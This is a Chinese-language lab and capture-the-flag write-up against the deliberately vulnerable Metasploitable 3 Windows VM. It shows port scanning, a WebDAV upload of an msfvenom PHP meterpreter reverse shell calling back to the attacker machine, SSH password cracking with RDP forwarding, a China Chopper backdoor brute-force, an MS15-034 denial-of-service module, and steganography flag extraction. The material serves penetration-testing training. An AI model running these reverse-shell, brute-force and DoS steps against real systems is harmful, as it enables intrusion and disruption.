靶机:metasploitable 3,有许多漏洞供练习,并藏有15个隐藏彩蛋,老师发的镜像删去了部分有损坏的flag
一、信息搜集阶段
通过nmap扫描发现window靶机的ip地址10.0.2.4,PS:kali攻击机ip:10.0.2.15
启动msfconfig,使用nmap扫描全端口,发现靶机开启了如下端口,及其服务版本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 msf > workspace -a win08-r2 [*] Added workspace: win08-r2 [*] Workspace: win08-r2 msf > db_nmap -sS -sV -sC -p- -n -v 10.0.2.4 msf > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.0.2.4 21 tcp ftp open Microsoft ftpd 10.0.2.4 22 tcp ssh open OpenSSH 7.1 protocol 2.0 10.0.2.4 80 tcp http open Microsoft IIS httpd 7.5 10.0.2.4 1617 tcp java-rmi open Java RMI 10.0.2.4 3000 tcp http open WEBrick httpd 1.3.1 Ruby 2.3.1 ( 2016-04-26) 10.0.2.4 4848 tcp ssl/http open Oracle Glassfish Application Ser ver 10.0.2.4 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP /UPnP 10.0.2.4 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1 10.0.2.4 8080 tcp http open Sun GlassFish Open Source Editio n 4.0 10.0.2.4 8282 tcp http open Apache Tomcat/Coyote JSP engine 1.1 10.0.2.4 8484 tcp http open Jetty winstone-2.8 10.0.2.4 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/ 5.3.10 DAV/2 10.0.2.4 9200 tcp wap-wsp open 10.0.2.4 49153 tcp msrpc open Microsoft Windows RPC 10.0.2.4 49154 tcp msrpc open Microsoft Windows RPC 10.0.2.4 49179 tcp java-rmi open Java RMI 10.0.2.4 49180 tcp tcpwrapped open
二、漏洞分析与利用阶段
(1)WebDAV服务漏洞
通过kali提供的WebDAV服务漏洞利用工具DAVTest。该工具会自动检测权限,寻找可执行文件的权限。一旦发现,用户就可以上传内置的后门工具,对服务器进行控制。同时,该工具可以上传用户指定的文件,便于后期利用。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 root💀kali)-[~] └─# davtest -url http://10.0.2.4:8585/uploads/ ******************************************************** Testing DAV connection OPEN SUCCEED: http://10.0.2.4:8585/uploads ******************************************************** NOTE Random string for this session: TUv6QRb ******************************************************** Creating directory MKCOL SUCCEED: Created http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb ******************************************************** Sending test files PUT php SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.php PUT cgi SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.cgi PUT shtml SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.shtml PUT jhtml SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.jhtml PUT aspx SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.aspx PUT jsp SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.jsp PUT html SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.html PUT txt SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.txt PUT pl SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.pl PUT asp SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.asp PUT cfm SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.cfm ******************************************************** Checking for test file execution EXEC php SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.php EXEC cgi FAIL EXEC shtml FAIL EXEC jhtml FAIL EXEC aspx FAIL EXEC jsp FAIL EXEC html SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.html EXEC txt SUCCEED: http://10.0.2.4:8585/uploads/DavTestDir_TUv6QRb/davtest_TUv6QRb.txt EXEC pl FAIL EXEC asp FAIL EXEC cfm FAIL
检测发现可以上传php文件
生成攻击载荷并上传:
1 2 3 4 5 6 7 8 9 10 (root💀kali)-[~] └─$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=6666 -f raw >demon.php (root💀kali)-[~] └─$ davtest -url http://10.0.2.4:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_12ja05EL/66.php ******************************************************** Testing DAV connection OPEN SUCCEED: http://10.0.2.4:8585/uploads ******************************************************** unless Uploading file
1 2 3 4 5 6 7 8 9 10 11 12 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.2.15 LHOST => 10.0.2.15 msf6 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.0.2.15:8888 [*] Meterpreter session 1 opened (10.0.2.15:8888 -> 10.0.2.4:49914 ) at 2021-12-22 06:41:03 -0500
得到Meterpreter,成功!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel detach Detach the meterpreter session (for http/https) disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen download Download a file or directory edit Edit a file getlwd Print local working directory lcd Change local working directory lls List local files lpwd Print local working directory upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- portfwd Forward a local port to a remote service Stdapi: Audio Output Commands ============================= Command Description ------- ----------- play play a waveform audio file (.wav) on the target system
(2)ssh测试
首先,通过hydra进行密码爆破,得到Administrator账号密码:admin321,即可建立ssh链接。
1 2 3 4 5 (root💀kali)-[~] └─$ ssh Administrator@10.0.2.4 Administrator@10.0.2.4's password: -sh-4.3$
检测3389端口,发现端口是打开的
1 2 3 4 5 6 7 8 9 10 11 (root💀kali)-[~] └─$ nmap -p 3389 10.0.2.4 Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-17 01:57 EST Nmap scan report for 10.0.2.4 Host is up (0.00034s latency). PORT STATE SERVICE 3389/tcp filtered ms-wbt-server MAC Address: 08:00:27:0B:0C:01 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
端口转发,并进行连接
1 2 3 4 5 6 7 (root💀kali)-[~] └─$ ssh -L 3389:localhost:3389 Administrator@10.0.2.4 Administrator@10.0.2.4's password: Last login: Thu Dec 16 22:54:07 2021 from 10.0.2.15 -sh-4.3$ (kali㉿kali)-[~] └─$ rdesktop 127.0.0.1:3389
实现可以直接在kali攻击机上进行对靶机的操作
(3)caidao
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 msf6 > search caidao Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution 1 auxiliary/scanner/http/caidao_bruteforce_login normal No Chinese Caidao Backdoor Bruteforce Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/caidao_bruteforce_login msf6 > use auxiliary/scanner/http/caidao_bruteforce_login msf6 auxiliary(scanner/http/caidao_bruteforce_login) > set RHOSTS 10.0.2.4 RHOSTS => 10.0.2.4 msf6 auxiliary(scanner/http/caidao_bruteforce_login) > set TARGETURI /caidao.asp TARGETURI => /caidao.asp msf6 auxiliary(scanner/http/caidao_bruteforce_login) > run [-] 10.0.2.4:80 - Failed: 'admin' [-] 10.0.2.4:80 - Failed: '123456' [-] 10.0.2.4:80 - Failed: '12345' [-] 10.0.2.4:80 - Failed: '123456789' [+] 10.0.2.4:80 - Success: 'password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
找到连接口令:‘password’
(4)80端口–http
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞(远程蓝屏代码)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 msf6 > search ms15_034 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service 1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf6 > use auxiliary/dos/http/ms15_034_ulonglongadd msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 10.0.2.4 RHOSTS => 10.0.2.4 msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > show options Module options (auxiliary/dos/http/ms15_034_ulonglongadd): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.0.2.4 yes The target host(s), see https://github.com/rapid7/metasploit-framewor k/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.p ng) THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run [*] DOS request sent [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
结果靶机没有蓝屏,而是立即重启了,也蛮有趣的
三、后渗透阶段(flag挖掘)
很像是在打CTF,做得蛮开心的~
1. the_joker
发现80端口是打开的,用浏览器打开,不难从html页面发现隐藏的HEX代码,通过curl http://10.0.2.4/ > data.html cat data.html | perl -ne 'print $1 if(/value\=\"(\w+)\"\>/g)' > data.hex 获得hex.txt见附件
不难猜想可由hex转图片,于是写出hex2png.py ,获得flag。
代码如下:
1 2 3 4 5 6 import binasciiwith open ('hex.txt' ) as f, open ('data.png' , 'wb' )as fout: for line in f: fout.write(binascii.unhexlify(line))
2. Ace_of_Hearts
打开目录不难找到一张普通的红桃A,文件异常之大,不难发现端倪,可能是多文件隐藏。
查看二进制格式,把第一个jpg文件删去,即得到flag
3. Jack_of_Hearts
不难在document目录下发现Jack_of_Hearts.docx,考虑单文件docx中的PNG隐藏文件
将docx文件后缀改为.zip就会得到一个压缩文件,在\word\media中就能找到隐藏的图像flag文件)
4. Six_of_Diamonds
在C:\inetpub\wwwroot目录下不难找到six_of_diamonds压缩包,发现经过加密
首先考虑是不是伪加密,将全局方式位标记改为 00 00,未能成功打开,说明确实有密码
使用ARCHPR进行爆破,密码为vagrant,获得flag
5. King_of_Diamonds
在C:\wamp\www\wordpress\wp-content\uploads\2017\09目录下直接找到King_of_Diamonds.png
6. Three_of_Spades
此图片我一通好找,突然想起可能是被隐藏了,最终在C:\windows目录下找到了
但是仍然无法打开,二进制格式打开根据文件头猜测文件被处理过,对文件异或操作,获得正常png格式
处理图片的代码:
1 2 3 4 5 6 7 8 _in = 'three_of_spades.png' ; _out = _in + '.out' ; b = bytearray (open (_in , 'rb' ).read()) for i in range (len (b)): b[i] ^= 0x0f open (_out, 'wb' ).write(b)
7. Seven_of_Spades
在Libraries\Documents目录下发现Seven of Spades.pdf,不难想到是隐藏在文件里了,使用pdf-parser即可获得flag
8. Four_of_Clubs
类似7,Libraries\Music目录下找到Four_of_Clubs.wav,使用binwalk分离其中的flag
